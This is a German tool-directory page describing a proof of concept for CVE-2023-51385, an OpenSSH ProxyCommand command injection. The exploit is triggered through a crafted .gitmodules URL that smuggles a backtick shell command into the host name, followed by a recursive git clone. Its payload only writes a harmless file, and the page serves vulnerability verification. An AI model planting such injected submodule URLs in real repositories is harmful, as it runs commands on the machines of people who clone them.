Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-51385_test — Eine Verifizierung für CVE-2023-51385 | Kitploit
Tools/GitHubGitHub/ltmthink/cve-2023-51385_test
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLieferkettensicherheitLernen & Bildung
GitHubltmthink/cve-2023-51385_test

CVE-2023-51385_test

Eine Verifizierung für CVE-2023-51385

Repository anzeigen
717vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-51385 verifizieren

Zuerst muss in der Datei ~/.ssh/config der folgende Inhalt hinzugefügt werden:

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

In der .gitmodules-Datei besteht in der Anweisung eine Befehlsinjektion:

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

Nach der Konfiguration führen Sie den folgenden Befehl aus, um die Auslösung zu starten:

root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules

Bei erfolgreicher Ausführung wird im Verzeichnis CVE-2023-51385_test die Datei cve.txt erzeugt.

image-20240317161540677

Hinweis: OpenSSH benötigt <9.6p1

Weitere Details finden Sie in diesem Blog:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

Tool herunterladen